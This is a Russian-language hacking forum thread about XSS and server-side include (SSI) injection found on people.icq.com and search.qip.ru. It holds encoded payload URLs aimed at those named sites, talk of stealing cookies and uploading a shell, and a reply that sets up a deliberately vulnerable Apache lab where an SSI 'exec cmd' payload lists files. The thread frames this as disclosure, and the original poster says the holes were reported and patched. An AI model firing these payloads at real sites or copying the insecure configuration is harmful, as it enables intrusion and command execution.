Не так давно на сервере people.icq.com изменили форму отображения инфо о уине. Пример:

http://savepic.su/5636998.png

Самая первая мысль, а что если в поле people.icq.com/people// ввести что-то другое?

Попробует выполнить скрипт XSS работает, значит можно воровать кукисы [B]:

http://savepic.su/5651353.png

А может кто-то по ошибке забыл отключить Server Side Include (SSI)? Сервер пашет на nginx. На удачу составим запрос с отображением локального времени :

http://savepic.su/5688216.png

Опачки! Работает!

А адрес сервера покажет?

http://savepic.su/5667736.png

А путь к корню?

http://savepic.su/5647256.png

Так может и шелл можно залить " --> ???...

А это уже совсем другая история....

P.S. На момент написания статьи администрация ICQ уже была оповещена о данной уязвимости и залатала дырку.

(с) alkos

↑ (https://antichat.live/posts/3851305/)
шелл то хоть залил?


http://savepic.su/5673884.gif

Читал пост ТС и все боялся что он подробно расскажет всем как залить шелл)

Обошлось.

Зла не хватает. Кто то адаптируется, а кто то взламывает.

Ну и в продолжении...


http://search.qip.ru/search/?query=\x3C\x2Fscript\x3E\x3Cscript\x3Ealert\x28do cument.domain\x29\x3C\x2Fscript\x3E

http://dl2.joxi.net/drive/0011/0659/742035/150526/403e31e3e7.jpg

http://search.qip.ru/search/?query=\x3C\x21--\x23echo+var\x3D\x22DOCUMENT_ROOT\x22+--\x3E

90 строка

http://dl1.joxi.net/drive/0011/0659/742035/150526/f017ea6010.jpg

Алкос подари 31338))

↑ (https://antichat.live/posts/3852232/)
Алкос подари 31338))


это номер [ e l i T e ] вообще-то, у него спрашивай

странно я думал это анрег.

31338 » 0x05 — REGISTRED…

31338 » 11.01.2013 07:01:33

Предполагаю, что такие вещи актуальны не только для XSS, но и SQL inj, когда результат запроса выводится на страницу, тоесть может быть нечто подобноеSQL inj -> XXS(SIXSS) -> SSI. Только стоит сказать один важный момент, сам nginx хоть и имеет потдержку SSI, но он не умееет запускать внешнюю программу, в отличии от Apache(нагуглил gemaglabin (https://antichat.live/members/26173/)). В Apache SSI реализован через модульmod_include, но для работыexec cmd еще нужно mod_cgi или mod_cgid, а также отключенная директива IncludesNoExec, иначе в контенте на html страничке будет [an error occurred while processing this directive] и в лог ошибок(если включен) будет падать запись:AH01371: unknown directive "exec" in parsed doc.


sudo mkdir -p /srv/www/vuln_dev/public_html
sudo mkdir /srv/www/vuln_dev/logs
sudo chown $USER: -R /srv/www/vuln_dev/public_html
sudo nano /etc/apache2/sites-available/vuln-dev.conf

ServerAdmin vuln@locahost
ServerName vuln
DocumentRoot /srv/www/vuln_dev/public_html


AllowOverride All
Require all granted

ErrorLog /srv/www/vuln_dev/logs/error.log
LogLevel warn

sudo a2ensite vuln-dev.conf
sudo nano /etc/hosts
127.0.0.1 vuln
sudo nano /etc/apache2/mods-available/userdir.conf
#IncludesNoExec
sudo a2enmod include
sudo a2enmod cgi
sudo service apache2 restart


nano /srv/www/vuln_dev/public_html/.htaсcess


Options Includes
AddType application/x-httpd-php .html
AddOutputFilter INCLUDES .html


nano /srv/www/vuln_dev/public_html/index.html



Тест






Запрос


это %3C!--%23exec%20cmd%3D%22ls%22%20--%3E
http://vuln/?t=%3C!--%23exec%20cmd%3D%22ls%20-la%22%20--%3E


Ответ



Тест


total 16
drwxr-xr-x 2 omen666 omen666 4096 May 28 04:26 .
drwxr-xr-x 4 root root 4096 May 28 01:01 ..
-rw-r--r-- 1 omen666 omen666 87 May 28 04:26 .htaccess
-rw-r--r-- 1 omen666 omen666 138 May 28 03:53 index.html


ps все пошла школота хекать )

В продолжение темы. Вместе с Stored XSS на icq.com/chat/* (пост (https://antichat.live/threads/432429/)) нашлась также и SSI Inj. Поскольку команда exec cmd не работала, выдавая упомянутое выше [an error occurred while processing this directive], то, по-видимому, залить шелл возможности не имелось.

Fixed.

http://savepic.ru/8712324.png

http://savepic.ru/8692868.png

Poltergeist, забавно. Ничему жизнь не учит.